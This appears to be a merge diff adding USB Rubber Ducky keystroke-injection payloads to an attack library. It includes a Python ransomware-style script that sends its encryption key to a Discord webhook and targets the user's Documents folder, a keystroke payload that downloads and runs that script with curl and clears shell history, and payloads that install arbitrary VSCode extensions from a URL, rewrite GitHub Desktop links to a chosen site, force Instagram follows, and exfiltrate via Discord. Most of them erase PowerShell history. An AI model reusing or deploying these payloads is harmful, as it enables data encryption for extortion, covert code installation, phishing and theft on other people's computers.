Merge b93594cb9e into 675972662a

Exfiltrate NTLM hash using DS3

payloads/library/execution/EncryptAllDocuments_Linux/EncryptAllDocumentsScript.py

@@ -0,0 +1,88 @@
+
+"""
+ ____    _    _   _  ____ _____ ____   ___  _   _ ____  
+|  _ \  / \  | \ | |/ ___| ____|  _ \ / _ \| | | / ___| 
+| | | |/ _ \ |  \| | |  _|  _| | |_) | | | | | | \___ \ 
+| |_| / ___ \| |\  | |_| | |___|  _ <| |_| | |_| |___) |
+|____/_/   \_\_| \_|\____|_____|_| \_\\___/ \___/|____/ 
+                                                        
+Warning: The encryption function has the ability to encrypt the entire folder
+specified, including all files and subfolders contained within it. Improper usage or accidental
+execution of this function may result in permanent loss of encrypted data. We strongly advise
+using this function only if you have a full understanding of what you are doing, and to perform
+a complete backup of any data that will be encrypted before proceeding. If you have any doubts
+or uncertainties, we recommend seeking professional advice before using this function.
+
+"""
+
+
+from cryptography.fernet import Fernet
+import os
+import requests
+import subprocess
+import json
+
+
+"""Decrypt function"""
+def dec_folder(path, fernet):
+    for root, files in os.walk(path):
+        for filename in files:
+            filepath = os.path.join(root, filename)
+            if not os.access(filepath, os.R_OK):
+                continue
+            if "directory" in str(os.system(f"file {filepath}")):
+                dec_folder(path=filepath, fernet=fernet)
+            with open(filepath, "rb") as f:
+                data = f.read()
+            decrypted_data = fernet.decrypt(data) # the only one line different from enc_folder
+            with open(filepath, "wb") as f:
+                f.write(decrypted_data)
+
+
+# """Encrypt function"""
+# def enc_folder(path, fernet):
+#     for root, files in os.walk(path):
+#         for filename in files:
+#             filepath = os.path.join(root, filename)
+#             if not os.access(filepath, os.R_OK):
+#                 continue
+#             if "directory" in str(os.system(f"file {filepath}")):
+#                 enc_folder(path=filepath, fernet=fernet)
+#             with open(filepath, "rb") as f:
+#                 data = f.read()
+#             encrypted_data = fernet.encrypt(data) # the only one line different from dec_folder
+#             with open(filepath, "wb") as f:
+#                 f.write(encrypted_data)
+
+
+"""Send the key used for encryption"""
+def send_key(username, key, discord_webhook_url, INITIAL_PATH, FERNET):
+    try:
+        message = {
+            "username": f"{username}",
+            "content": f"Key:{key}"
+        }
+        message_json = json.dumps(message)
+        resp = requests.post(discord_webhook_url, data=message_json, headers={'Content-Type': 'application/json'})
+        if not resp.ok:
+            raise ValueError("Error sending the key")
+        # enc_folder(path=INITIAL_PATH, fernet=FERNET)
+    except:
+        print("Yoh bro you are safe now, but be very careful next time!!!!")
+        exit()
+
+
+
+"""Just some variables"""
+KEY = Fernet.generate_key()
+FERNET = Fernet(KEY)
+USERNAME = subprocess.check_output(['whoami']).decode('ascii')
+INITIAL_PATH = f"/home/{USERNAME}/Documents/"
+WEBHOOK_URL = 'https://discord.com/api/webhooks/123/abc'
+
+"""
+I moved the sending of the key one execution before encryption so that if there should be any problem
+ in sending (no connection, firewall blocking sending, etc...) it will not continue encrypting the data.
+It is a security measure for the users who will be using this payload.
+"""
+send_key(username=USERNAME, key=KEY, discord_webhook_url=WEBHOOK_URL, INITIAL_PATH=INITIAL_PATH, FERNET=FERNET)

payloads/library/execution/EncryptAllDocuments_Linux/README.md

@@ -0,0 +1,54 @@
+ 
+# Encrypt All Documents - Linux
+
+A script used to encrypt all documents with the Fernet algorithm.
+
+**Category**: Execution
+
+## Description
+
+A script used to encrypt all documents with the Fernet algorithm.
+
+The main use case for that payload is to have a quick tool to encrypt each of your own documents while saving the key so that you can decrypt everything later.
+
+I see it as a big red movie button for emergencies, the encryption speed is pretty fast and saving the key is pretty much immediate so I would imagine that as the sense of use. Remember that in the Python document you can also find the decryption function that will allow you to return to the original documents at any time, obviously via the saved key so make sure you have properly saved a copy before continuing.
+
+With the new changes only if the key saving is successful you will be able to continue with the encryption. This is a security measure applied for users of the payload.
+
+## Getting Started
+
+### Dependencies
+
+* Internet Connection for the Exfiltration
+
+### Settings
+
+* Set the Discord webhook or whatever you want for the exfiltration
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
+      </a>
+      <br>Instagram
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Discord
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/EncryptAllDocuments_Linux/payload.txt

@@ -0,0 +1,48 @@
+REM ########################################
+REM #                                      |
+REM # Title        : Encrypt All Documents |
+REM # Author       : Aleff                 |
+REM # Version      : 1.1                   |
+REM # Category     : Execution             |
+REM # Target       : Linux                 |
+REM #                                      |
+REM ########################################
+
+
+REM ATTENTION - BEFORE USING THIS PAYLOAD MAKE SURE YOU UNDERSTAND WHAT IT DOES
+REM 
+REM Script description
+REM
+REM The Python code defines a function "cyp_folder" that encrypts all files in a folder (and its subfolders) using the Fernet encryption algorithm. The function takes two arguments: the path of the folder to be encrypted ("path") and a Fernet object ("fernet") that contains the encryption key.
+REM
+REM Inside the function, the os.walk function is used to obtain a list of all files in the specified folder and its subfolders. For each file found, its full path is created and checked for readability using the os.access function. If the file is not readable, the loop moves on to the next file.
+REM 
+REM The "file" Linux command is then executed to determine if the file is a text file or a directory. If the file is a directory, the "cyp_folder" function is recursively called on the directory.
+REM 
+REM If the file is a text file (or however not a directory), it is opened in binary read mode using the "open" function. The contents of the file are read and then encrypted using the "encrypt" function of the Fernet object.
+REM 
+REM Finally, the file is opened in binary write mode and the encrypted content is written to the file, overwriting the original content.
+REM 
+REM In summary, the code encrypts all files in a folder (and its subfolders) using the Fernet encryption algorithm and overwrites the original content with the encrypted content.
+REM  
+
+REM Requirements:
+REM     - Internet Connection
+REM     - Discord Webhook
+
+DELAY 1000
+CTRL-ALT t
+DELAY 2000
+
+REM Reply example.com with YOUR LINK. The Payload should be EncryptAllDocumentsScript.py
+DEFINE PAYLOAD example.com
+STRING curl 
+STRING PAYLOAD
+STRING  > script.py
+ENTER
+
+REM It depends by the internet connection, btw 2/3 seconds is a lot for a fiew text line...
+DELAY 2000
+
+STIRNG python3 script.py; history -c; exit;
+ENTER

payloads/library/execution/Follow_Someone_On_Instagram/README.md

@@ -0,0 +1,50 @@
+# Follow someone on Instagram
+
+This script can be used to prank friends by having them follow an Instagram account or it can be used by yourself to speed up this process.
+
+Open a PowerShell, start a process trough the default browser that go to an instagram link like this one `https://www.instagram.com/alessandro_greco_aka_aleff/` closing the PowerShell. Then use some TABs to go to Follow button and then close the browser.
+
+**Category**: Execution
+
+## Note
+
+Tested on:
+- Windows 11 Eng
+- Firefox Browser Eng
+
+## Dependencies
+
+* Internet Connection
+* Instagram account logged in
+
+## Settings
+
+- You must set the Instagram account that you want to follow i.e. https://www.instagram.com/alessandro_greco_aka_aleff/
+
+    `[18] DEFINE #INSTAGRAM_LINK example`
+
+- It depends by the computer power and by the internet connection power
+
+    `[72] DELAY 2000`
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/Follow_Someone_On_Instagram/payload.txt

@@ -0,0 +1,81 @@
+REM_BLOCK
+################################################
+#                                              #
+# Title        : Follow someone on Instagram   #
+# Author       : Aleff                         #
+# Version      : 1.0                           #
+# Category     : Execution                     #
+# Target       : Windows 10/11                 #
+#                                              #
+################################################
+END_REM
+
+REM Requirements:
+REM     - Internet Connection
+REM     - Instagram account logged in
+
+REM You must set the Instagram account that you want to follow i.e. https://www.instagram.com/alessandro_greco_aka_aleff/
+DEFINE #INSTAGRAM_LINK example
+
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+
+GUI r
+DELAY 500
+STRINGLN powershell
+DELAY 2000
+
+STRINGLN Start-Process "#INSTAGRAM_LINK"; exit;
+REM It depends by the computer power and by the internet connection power
+DELAY 2000
+
+REM Go to Follow button and click it
+REPEAT 12 TAB
+DELAY 500
+ENTER
+DELAY 1000
+
+REM Close the Browser
+ALT F4

payloads/library/execution/Install_Any_Arbitrary_VSCode_Extension/README.md

@@ -0,0 +1,98 @@
+# Install Any Arbitrary VSCode Extension
+
+This DuckyScript script is designed to automate the installation of any arbitrary Visual Studio Code (VSCode) extension on Windows 10. It performs the following tasks:
+
+1. Removes any pre-existing version of the extension (if applicable).
+2. Downloads a ZIP archive of a VSCode extension.
+3. Extracts the extension to the correct VSCode extensions folder.
+
+The script makes use of PowerShell to manage file paths and execute commands necessary for the installation process. The user must provide the name of the extension folder and the link to the ZIP archive containing the extension.
+
+## First Of All!
+
+Installing Arbotrary Visual Studio Code (VSCode) extensions can pose cybersecurity risks because extensions, often developed by third parties, have access to critical functionalities of the editor and the operating system. A malicious extension could execute harmful code, access local files, or exfiltrate sensitive data without the user's knowledge. Additionally, if extensions are not from trusted sources or are not regularly updated, they may contain vulnerabilities that attackers can exploit, compromising the security of both the system and the entire development environment.
+
+So...
+- Before doing these tests make sure you have full permission from the owner of the computer in case it is not you.
+- Always check the source and source code before doing this
+- If even one line of code is not clear to you, you should not proceed at all because it takes only a little to do damage.
+
+## Features
+
+- Detects Windows passively through [PASSIVE_WINDOWS_DETECT](https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt) by Hak5.
+- Installs a VSCode extension by downloading a ZIP file and extracting it to the correct location.
+- Removes any previous version of the extension.
+- Completely automated, requiring no manual intervention once the script is executed.
+
+## Requirements
+
+- **Target OS**: Windows 10/11
+- **VSCode Path**: The script assumes that VSCode is installed in its default location. If it is installed in a different location, the paths in the script may need to be updated.
+- **Compilation**: Make sure that the extension you are going to install has the out folder inside, that is, the folder that is generated as a result of compilation. Without this folder the extension cannot be loaded properly.
+- **Internet Connection**: This is mandatory in case you want to download the archive from the Internet, whereas if you want to download from a server in the intranet you only need to be connected to the local network. This basically depends on the individual case....
+
+## Usage
+
+### DuckyScript Configuration
+
+Before running the script, make sure to configure the following two variables in the script:
+
+1. `#EXTENSION_NAME`: Replace this with the name of the folder where the extension will be installed.
+    ```plaintext
+    DEFINE #EXTENSION_NAME example
+    ```
+   Example: If the extension folder name is `DuckyScriptCookbook`, then replace `example` with `DuckyScriptCookbook`.
+
+2. `#ARCHIVE_LINK`: Replace this with the actual URL to the ZIP file of the VSCode extension you want to install.
+    ```plaintext
+    DEFINE #ARCHIVE_LINK https://example.com/path/to/archive.zip
+    ```
+
+### PowerShell Commands Breakdown
+
+- **Detecting and Removing Previous Extension**: The script checks if an official version of the extension is already installed and removes it:
+    ```powershell
+    $extensionsPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
+    if (Test-Path -Path $extensionsPath -PathType Container) {
+        Remove-Item -Recurse -Force -Path $extensionsPath
+    }
+    ```
+
+- **Downloading and Extracting the New Extension**: The script downloads the extension from the link provided inside a temporary folder and extracts it inside the official (the default) VSCode extensions folder:
+    ```powershell
+    $url = "#ARCHIVE_LINK"
+    $downloadPath = "$env:TEMP\#EXTENSION_NAME.zip"
+    $extractPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
+    Invoke-WebRequest -Uri $url -OutFile $downloadPath
+    if (Test-Path -Path $downloadPath) {
+        Expand-Archive -Path $downloadPath -DestinationPath $extractPath -Force
+        Remove-Item -Path $downloadPath -Force
+    }
+    ```
+  
+## Notes
+- Ensure that the ZIP file is structured properly (i.e., it contains all necessary files for the extension) before attempting to install.
+- Make sure that PowerShell is available on the target machine.
+- This script is intended for Windows 10/11 systems. Compatibility with other versions of Windows has not been tested.
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/Install_Any_Arbitrary_VSCode_Extension/payload.txt

@@ -0,0 +1,88 @@
+REM_BLOCK
+##########################################################
+#                                                        #
+# Title        : Install Any Arbitrary VSCode Extension  #
+# Author       : Aleff                                   #
+# Version      : 1.0                                     #
+# Category     : Execution                               #
+# Target       : Windows 10                              #
+#                                                        #
+##########################################################
+END_REM
+
+REM Replace "example" with the name of the extension folder
+DEFINE #EXTENSION_NAME example
+
+REM Replace "https://example.com/path/to/archive.zip" with your own ZIP Archive link
+DEFINE #ARCHIVE_LINK https://example.com/path/to/archive.zip
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+GUI r
+DELAY 1000
+STRINGLN PowerShell
+DELAY 1000
+
+STRINGLN_POWERSHELL
+    $extensionsPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
+
+    if (Test-Path -Path $extensionsPath -PathType Container) {
+        Remove-Item -Recurse -Force -Path $extensionsPath
+    }
+END_STRINGLN
+
+REM May it depends by the extension...
+DELAY 2000
+
+STRINGLN_POWERSHELL
+    $url = "#ARCHIVE_LINK"
+    $downloadPath = "$env:TEMP\#EXTENSION_NAME.zip"
+    $extractPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
+    Invoke-WebRequest -Uri $url -OutFile $downloadPath
+    if (Test-Path -Path $downloadPath) {
+        Expand-Archive -Path $downloadPath -DestinationPath $extractPath -Force
+        Remove-Item -Path $downloadPath -Force
+        Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
+    }
+END_STRINGLN

payloads/library/execution/Install_Official_VSCode_Extension/README.md

@@ -0,0 +1,55 @@
+# Install Official VSCode Extension
+
+This script automates the installation of an official Visual Studio Code extension on Windows 10/11 systems. The extension to be installed is specified via the `publisher.extensionName` parameter. The script uses passive operating system detection to determine if the system is running Windows, and proceeds with the extension installation accordingly.
+
+## First Of All!
+
+Installing Arbotrary Visual Studio Code (VSCode) extensions can pose cybersecurity risks because extensions, often developed by third parties, have access to critical functionalities of the editor and the operating system. A malicious extension could execute harmful code, access local files, or exfiltrate sensitive data without the user's knowledge. Additionally, if extensions are not from trusted sources or are not regularly updated, they may contain vulnerabilities that attackers can exploit, compromising the security of both the system and the entire development environment.
+
+So...
+- Before doing these tests make sure you have full permission from the owner of the computer in case it is not you.
+- Always check the source and source code before doing this
+- If even one line of code is not clear to you, you should not proceed at all because it takes only a little to do damage.
+
+## Features
+
+- **Passive Windows Detection:** The script includes an extension (`PASSIVE_WINDOWS_DETECT`) that passively detects if the operating system is Windows.
+- **VSCode Extension Installation:** It uses the `code --install-extension` command to install the specified VSCode extension.
+- **Windows 10/11 Compatibility:** Designed to work on Windows 10 and 11.
+- **PowerShell History Cleanup:** After installation, the PowerShell history is cleared.
+
+## Usage
+
+### Required Parameter
+
+- **#EXTENSION**: This parameter represents the ID of the VSCode extension you wish to install. The ID should follow the format `publisher.extensionName` (e.g., `Aleff.duckyscriptcookbook`).
+
+## Requirements
+
+- **Operating System**: Windows 10 or 11
+- **PowerShell**
+- **Visual Studio Code**
+- **Internet**
+- **Permissions to execute commands in PowerShell**
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/Install_Official_VSCode_Extension/payload.txt

@@ -0,0 +1,64 @@
+REM_BLOCK
+#####################################################
+#                                                   #
+# Title        : Install Official VSCode Extension  #
+# Author       : Aleff                              #
+# Version      : 1.0                                #
+# Category     : Execution                          #
+# Target       : Windows 10/11                      #
+#                                                   #
+#####################################################
+END_REM
+
+REM replace 'publisher.extensionName' with the publisher id and extension id, for istance 'Aleff.duckyscriptcookbook'
+DEFINE #EXTENSION publisher.extensionName
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+GUI r
+DELAY 1000
+STRINGLN PowerShell
+DELAY 1000
+
+STRINGLN code --install-extension #EXTENSION; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit

payloads/library/execution/Replace_Links_In_GithubDesktop/README.md

@@ -0,0 +1,69 @@
+# Replace Links In GithubDesktop
+
+This script is written in **DuckyScript** and is designed to modify links in the GitHub Desktop application on Windows 10/11 systems. It automates the replacement of GitHub URLs with a custom URL defined by the user.
+
+![](https://github.com/aleff-github/Deposito/blob/main/Replace_Links_In_GithubDesktop/GithubDesktop.gif?raw=true)
+
+## Table of Contents
+
+- [Features](#features)
+- [Prerequisites](#prerequisites)
+- [Usage](#usage)
+- [Credits](#credits)
+
+## Features
+
+This script replaces the hardcoded GitHub links in the `renderer.js` and `main.js` files inside the GitHub Desktop application with a custom link provided by the user. It does the following:
+
+1. Detects the installation folder of GitHub Desktop.
+2. Identifies the latest installed version of GitHub Desktop. It may happen that there are multiple versions on the computer but it is always the most recent one that is used, I would suggest to Github Desktop developers to remove old versions that unnecessarily burden a computer.
+3. Replaces any occurrences of GitHub URLs in the `renderer.js` and `main.js` files with a new link defined by the user.
+
+The script uses **PowerShell** to perform this replacement after detecting the operating system and target files.
+
+## Prerequisites
+
+- **Windows 10/11**
+- **GitHub Desktop** installed on the machine.
+
+## Usage
+
+1. **Modify the script**:
+   - Define the new URL to replace the original GitHub link by modifying the `#NEW_LINK` variable in the script:
+     ```duckyscript
+     DEFINE #NEW_LINK example.com
+     ```
+
+2. **Customization**:
+   - Ensure that the path to GitHub Desktop is correct. If GitHub Desktop is installed in a non-default location, modify the `#SUBDIRECTORY` variable accordingly:
+     ```ducky
+     DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop
+     ```
+
+3. **Execution**:
+   - Upon execution, the script will:
+     - Open PowerShell.
+     - Detect the GitHub Desktop installation directory.
+     - Replace all GitHub URLs in the `renderer.js` and `main.js` files with the new URL you specified.
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt

@@ -0,0 +1,109 @@
+REM_BLOCK
+#####################################################
+#                                                   #
+# Title        : Replace Links In GithubDesktop     #
+# Author       : Aleff                              #
+# Version      : 1.0                                #
+# Category     : Execution                          #
+# Target       : Windows 10/11                      #
+#                                                   #
+#####################################################
+END_REM
+
+
+REM REQUIRED - Define here the new url that will replace the original github link
+DEFINE #NEW_LINK example.com
+
+REM DON'T CHANGE - This variable is a constant in this case, change it only if you are sure that the path to GithubDesktop is not the default
+DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop
+
+
+REM_BLOCK
+    Credits:    Hak5 LLC
+    Website:    https://hak5.org/
+    Source:     https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
+END_REM
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+
+GUI r
+DELAY 1000
+STRINGLN PowerShell
+DELAY 1000
+
+STRINGLN_POWERSHELL
+    $path = Join-Path -Path $env:USERPROFILE -ChildPath "#SUBDIRECTORY"
+
+    $folders = Get-ChildItem -Path $path -Directory | Where-Object { $_.Name -like "app-*" }
+
+    $versions = $folders | ForEach-Object {
+        [PSCustomObject]@{
+            FolderName = $_.Name
+            Version = [version]($_.Name -replace "app-", "")
+        }
+    }
+
+    $latestVersionFolder = $versions | Sort-Object Version -Descending | Select-Object -First 1
+
+    $latestFolderPath = Join-Path -Path $path -ChildPath $latestVersionFolder.FolderName
+    $latestFolderPath += "\resources\app\"
+    $renderer = "renderer.js"
+    $main = "main.js"
+
+    $filePath = "$latestFolderPath$renderer"
+
+    $fileContent = Get-Content $filePath
+    $regex = [regex]'(https:\/\/(?![\w\d\.\/\-]*api)[\w\d\.\/\-]*github[\w\d\.\/\-]+)'
+    $modifiedContent = $fileContent -replace $regex, '#NEW_LINK'
+    Set-Content -Path $filePath -Value $modifiedContent
+
+
+    $filePath = "$latestFolderPath$main"
+    $fileContent = Get-Content $filePath
+    $regex = [regex]'openExternal\("(https:\/\/[\w\d\.\/\-]*github[\w\d\.\/\-]+)"\)'
+    $modifiedContent = $fileContent -replace $regex, ('openExternal("#NEW_LINK")')
+    Set-Content -Path $filePath -Value $modifiedContent; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
+
+END_STRINGLN

payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/payload.txt

@@ -1,25 +1,69 @@
-REM ###############################################################
-REM #                                                             |
-REM # Title        : Create And Exfiltrate A Webhook Of Discord   |
-REM # Author       : Aleff                                        |
-REM # Version      : 1.0                                          |
-REM # Category     : Exfiltration                                 |
-REM # Target       : Windows 10-11                                |
-REM #                                                             |
-REM ###############################################################
+REM_BLOCK
+###############################################################
+#                                                             #
+# Title        : Create And Exfiltrate A Webhook Of Discord   #
+# Author       : Aleff                                        #
+# Version      : 1.0                                          #
+# Category     : Exfiltration                                 #
+# Target       : Windows 10-11                                #
+#                                                             #
+###############################################################
+END_REM
 
 
 REM Requirements:
 REM     - Internet connection
 REM     - Discord Installed
 
-
 REM You must define the Discord server name i.e. Hak5
 DEFINE #SERVER_NAME example
 
 REM You must define your Discord webhook if you want to use this method for the exfiltration
 DEFINE #DISCORD_WEBHOOK example
 
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
